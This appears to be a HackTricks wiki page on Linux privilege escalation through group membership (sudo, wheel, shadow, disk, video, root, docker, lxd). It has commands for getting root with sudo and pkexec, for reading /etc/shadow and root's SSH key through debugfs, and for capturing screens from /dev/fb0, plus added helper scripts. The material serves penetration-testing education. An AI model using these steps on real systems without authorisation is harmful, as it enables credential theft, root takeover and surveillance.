{% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! * **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}

# Sudo/Admin Groups

## **PE - Method 1**

**Sometimes**, **by default \(or because some software needs it\)**, you can find lines like these inside the **/etc/sudoers** file:

```bash
# Allow members of group sudo to execute any command
%sudo ALL=(ALL:ALL) ALL

# Allow members of group admin to execute any command
%admin ALL=(ALL:ALL) ALL
```

This means that **any user that belongs to the sudo or admin group can execute anything through sudo**. Note that `/etc/sudoers` is normally mode 0440 and owned by root, so if you cannot read it, `sudo -l` lists the rules that apply to your user. In that case, **to become root you can just execute**:

```text
sudo su
```

## PE - Method 2

Find all SUID binaries and check whether the **pkexec** binary is among them:

```bash
find / -perm -4000 2>/dev/null
```

If you find that the binary **pkexec** is SUID and you belong to **sudo** or **admin**, you can probably execute binaries as root through pkexec. Check the contents of:

```bash
cat /etc/polkit-1/localauthority.conf.d/*
```

There you will find which groups are allowed to authenticate to **pkexec** (the polkit admin identities); **by default** on some Linux distributions the groups **sudo** and/or **admin** **appear** there.

**To become root you can execute**:

```bash
pkexec "/bin/sh" #You will be prompted for your user password
```

If you try to execute **pkexec** and you get this **error**:

```bash
polkit-agent-helper-1: error response to PolicyKit daemon: GDBus.Error:org.freedesktop.PolicyKit1.Error.Failed: No session for cookie
==== AUTHENTICATION FAILED ===
Error executing command as another user: Not authorized
```

**it is not because you lack permissions but because you are not connected through a GUI session**, so no polkit authentication agent is available to ask for your password. There is a workaround for this problem here: [https://github.com/NixOS/nixpkgs/issues/18012\#issuecomment-335350903](https://github.com/NixOS/nixpkgs/issues/18012#issuecomment-335350903).
**You need 2 different ssh sessions**:

{% code title="session1" %}
```bash
echo $$ #Step1: Get current PID
pkexec "/bin/bash" #Step 3, execute pkexec
#Step 5, if correctly authenticated, you will have a root session
```
{% endcode %}

{% code title="session2" %}
```bash
pkttyagent --process <PID from step 1> #Step 2, attach pkttyagent to session1
#Step 4, you will be asked in this session to authenticate to pkexec
```
{% endcode %}

# Wheel Group

**Sometimes**, **by default**, you can find this line inside the **/etc/sudoers** file:

```text
%wheel ALL=(ALL:ALL) ALL
```

This means that **any user that belongs to the wheel group can execute anything through sudo**. In that case, **to become root you can just execute**:

```text
sudo su
```

# Shadow Group

Users in the **shadow** group can **read** the **/etc/shadow** file:

```text
-rw-r----- 1 root shadow 1824 Apr 26 19:10 /etc/shadow
```

So read the file and try to **crack some hashes** (for example with john or hashcat).

# Disk Group

This privilege is **almost equivalent to root access**, as it lets you access all the data inside the machine through the raw block devices.

Files: `/dev/sd[a-z][1-9]`

```text
debugfs /dev/sda1
debugfs: cd /root
debugfs: ls
debugfs: cat /root/.ssh/id_rsa
debugfs: cat /etc/shadow
```

Note that with debugfs you can also **write files**. For example, to copy `/tmp/asd1.txt` out of the filesystem to `/tmp/asd2.txt` you can do:

```bash
debugfs -w /dev/sda1
debugfs: dump /tmp/asd1.txt /tmp/asd2.txt
```

However, if you try to **write** to **files owned by root** \(like `/etc/shadow` or `/etc/passwd`\) this way you will get a "**Permission denied**" error: `dump` creates the destination on the live filesystem with your own uid, so the normal file permissions still apply to it. Modifying the filesystem image itself through `debugfs -w` is possible, but doing that to a mounted filesystem behind the kernel's back risks corrupting it.
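The checks from Method 1, Method 2 and the Wheel Group section above, scripted as an added example (not code from the original page): it pulls the `%group` rules out of a sudoers file, the `AdminIdentities` groups out of a polkit localauthority directory, and compares both against the groups you are in. The function names, the file-path parameters and the sample files used to exercise it are this example's own assumptions; on a live host `/etc/sudoers` is usually only readable by root, so that half works only where you can read it (otherwise `sudo -l` is the source of truth).

```bash
#!/usr/bin/env bash
# Added example, not code from the original page: check which of a user's
# groups are granted privileges by sudoers %group rules (Method 1 / Wheel Group)
# and by polkit AdminIdentities (Method 2). Assumes classic sudoers syntax and
# the pklocalauthority key=value format ("AdminIdentities=unix-group:sudo;...").
# File paths are parameters so the functions can also run against copies.

# Print every active sudoers line whose first token is %<group>, for each group
# given after the file name. Comments are stripped first; "%#gid" survives
# because its "#" is not preceded by whitespace.
sudoers_group_rules() {
  local file="$1"
  shift
  [ -r "$file" ] || return 1
  local group
  for group in "$@"; do
    sed -e 's/^#.*//' -e 's/[[:space:]]\{1,\}#.*//' "$file" \
      | grep -E "^%${group}[[:space:]]+" || true
  done
}

# Return 0 when a rule has the "%group ALL=(...) [TAGS:] ALL" shape, i.e. any
# command on any host, which is what "sudo su" relies on.
rule_grants_everything() {
  printf '%s\n' "$1" | grep -qE \
    '^%[^[:space:]]+[[:space:]]+ALL[[:space:]]*=[[:space:]]*(\([^)]*\)[[:space:]]*)?([A-Z]+:[[:space:]]*)*ALL[[:space:]]*$'
}

# Print the unix groups listed as AdminIdentities in a polkit localauthority
# conf directory (e.g. /etc/polkit-1/localauthority.conf.d). pkexec accepts the
# password of any user in these groups.
polkit_admin_groups() {
  local dir="$1"
  [ -d "$dir" ] || return 1
  cat "$dir"/* 2>/dev/null \
    | grep -E '^[[:space:]]*AdminIdentities[[:space:]]*=' \
    | sed -e 's/^[^=]*=//' \
    | tr ';' '\n' \
    | sed -n 's/^[[:space:]]*unix-group:\([^[:space:]]*\).*$/\1/p'
}

# Cross-check a group list (default: the caller's own groups from id -Gn) against
# both sources. Prints one line per finding; returns 0 if anything was found.
audit_groups() {
  local sudoers="$1" polkit_dir="$2"
  shift 2
  local groups="$*"
  [ -n "$groups" ] || groups="$(id -Gn)"
  local found=1 g rule
  for g in $groups; do
    while IFS= read -r rule; do
      [ -n "$rule" ] || continue
      if rule_grants_everything "$rule"; then
        printf 'sudoers: group %s may run ANY command: %s\n' "$g" "$rule"
      else
        printf 'sudoers: group %s has a restricted rule: %s\n' "$g" "$rule"
      fi
      found=0
    done <<EOF
$(sudoers_group_rules "$sudoers" "$g")
EOF
    if polkit_admin_groups "$polkit_dir" | grep -qx "$g"; then
      printf 'polkit: group %s is an AdminIdentity, so pkexec will accept its password\n' "$g"
      found=0
    fi
  done
  return $found
}

# Stand-alone usage on a live host (sudoers is usually 0440 root, so that part
# only works if you can read it; otherwise rely on "sudo -l"):
#   audit_groups /etc/sudoers /etc/polkit-1/localauthority.conf.d
```

A restricted rule (a single binary instead of `ALL`) is reported separately because it does not give you `sudo su`; it is still worth reading, since a single allowed binary is often enough for a GTFOBins-style escape.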
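To rehearse the debugfs commands from the Disk Group section without root or a real disk, here is an added example (not code from the original page) that builds a small ext2 image file, plants a constructed `/etc/shadow` in it and reads it back with the same `cat` and `dump` requests you would send against `/dev/sda1`. It assumes e2fsprogs (`mke2fs`, `debugfs`) is installed; the image path, the fake hash and the function names are constructed for the demo.

```bash
#!/usr/bin/env bash
# Added example, not code from the original page: rehearse the Disk Group
# technique on a throwaway ext2 image file instead of a real /dev/sdX. debugfs
# treats the image exactly like a block device you can read, so no root and no
# disk group membership is needed to practise the commands. Assumes e2fsprogs
# (mke2fs, debugfs) is installed; the image path and the shadow line are
# constructed for the demo and the hash is not a real one.
PATH="$PATH:/sbin:/usr/sbin"

# Build a 4 MiB ext2 image holding /etc/shadow with one constructed entry.
# $1 = image path. Returns 1 if e2fsprogs is missing.
make_demo_image() {
  local img="$1" src cmds
  command -v mke2fs >/dev/null 2>&1 && command -v debugfs >/dev/null 2>&1 || return 1
  truncate -s 4M "$img"
  mke2fs -q -F "$img" >/dev/null 2>&1
  src=$(mktemp)
  cmds=$(mktemp)
  printf 'root:$6$saltsalt$fakehashfakehash:19000:0:99999:7:::\n' > "$src"
  # "write" copies a native file into the image; the destination is a name in
  # the debugfs cwd, so cd into the directory first (-f runs a command script).
  printf 'mkdir etc\ncd etc\nwrite %s shadow\n' "$src" > "$cmds"
  debugfs -w -f "$cmds" "$img" >/dev/null 2>&1
  rm -f "$src" "$cmds"
}

# Read a file straight out of the image, like "debugfs: cat /etc/shadow" on /dev/sda1.
# $1 = image, $2 = path inside the image.
read_from_image() {
  debugfs -R "cat $2" "$1" 2>/dev/null
}

# Copy a file out of the image onto the native filesystem ("dump"). The native
# file is created with the caller's own uid, which is why dumping over a
# root-owned path such as /etc/shadow fails with Permission denied.
# $1 = image, $2 = path inside the image, $3 = native destination.
dump_from_image() {
  debugfs -R "dump $2 $3" "$1" 2>/dev/null
}

# Stand-alone usage:
#   img=$(mktemp) && make_demo_image "$img" && read_from_image "$img" /etc/shadow
```

On a real target replace the image path with the block device (`/dev/sda1` or whatever `lsblk` shows as the root filesystem); the `cat` and `dump` requests are identical. debugfs exits 0 even when a request fails, so check the output rather than the exit status.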
# Video Group

Using the command `w` you can find **who is logged in on the system**, and it will show output like this:

```bash
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
yossi    tty1                      22:16    5:13m  0.05s  0.04s -bash
moshe    pts/1    10.10.14.44      02:53   24:07   0.06s  0.06s /bin/bash
```

The **tty1** means that the user **yossi is logged in physically** at a terminal of the machine.

The **video group** has access to the screen output (the framebuffer), so it can basically watch the screen. To do so you need to **grab the current image on the screen** as raw data and find out the resolution the screen is using. The screen data can be saved from `/dev/fb0` and the resolution of this screen can be read from `/sys/class/graphics/fb0/virtual_size`:

```bash
cat /dev/fb0 > /tmp/screen.raw
cat /sys/class/graphics/fb0/virtual_size
```

To **open** the **raw image** you can use **GIMP**: select the **`screen.raw`** file and choose the file type **Raw image data**:

![](../../.gitbook/assets/image%20%28208%29.png)

Then set the Width and Height to the ones used on the screen and try the different Image Types \(select the one that renders the screen best\):

![](../../.gitbook/assets/image%20%28295%29.png)

# Root Group

It looks like by default **members of the root group** may have write access to some **service** configuration files, some **library** files or **other interesting things** that could be used to escalate privileges...

**Check which files root members can modify**:

```bash
find / -group root -perm -g=w 2>/dev/null
```

# Docker Group

You can mount the root filesystem of the host machine into a container's volume, so as soon as the container starts it loads a `chroot` into that volume. This effectively gives you root on the host machine.
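Back to the Video Group section: instead of guessing the image type in GIMP, the raw `/dev/fb0` dump can be unpacked on the command line. The following is an added example, not code from the original page; it assumes the common 32 bpp layout where each pixel is four bytes B, G, R, X (check `/sys/class/graphics/fb0/bits_per_pixel`, because a 16 bpp RGB565 console needs different unpacking), and the 2x2 sample buffer used to exercise it is constructed for the demo.

```bash
#!/usr/bin/env bash
# Added example, not code from the original page: convert the raw /dev/fb0 dump
# from the Video Group section into a PPM image with od and awk, so it can be
# viewed (or converted further) without GIMP. Assumes the common 32 bpp layout
# where each pixel is 4 bytes B,G,R,X; check /sys/class/graphics/fb0/bits_per_pixel,
# because a 16 bpp (RGB565) console needs different unpacking. The 2x2 sample
# buffer used to exercise this is constructed for the demo.

# Turn the "W,H" content of virtual_size into two words: "W H".
fb_size() {
  tr ',' ' ' < "$1"
}

# Write an ASCII PPM (P3) to stdout from a raw BGRX dump.
# $1 = raw dump, $2 = width, $3 = height. Only width*height pixels are read, so
# a dump that is longer than one frame (a large virtual_size) is fine; if the
# result looks sheared, the real line stride differs from width*4.
fb_to_ppm() {
  local raw="$1" w="$2" h="$3"
  printf 'P3\n%d %d\n255\n' "$w" "$h"
  head -c "$((w * h * 4))" "$raw" \
    | od -An -v -tu1 -w4 \
    | awk '{ print $3, $2, $1 }'   # B G R X -> R G B, one pixel per line
}

# Stand-alone usage on a host where you are in the video group:
#   cat /dev/fb0 > /tmp/screen.raw
#   fb_to_ppm /tmp/screen.raw $(fb_size /sys/class/graphics/fb0/virtual_size) > /tmp/screen.ppm
```

The resulting `.ppm` opens in any image viewer and converts to PNG with ImageMagick's `convert` if you need to exfiltrate it compactly.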
{% embed url="https://github.com/KrustyHack/docker-privilege-escalation" %}

{% embed url="https://fosterelli.co/privilege-escalation-via-docker.html" %}

# lxc/lxd Group

[lxc - Privilege Escalation](lxd-privilege-escalation.md)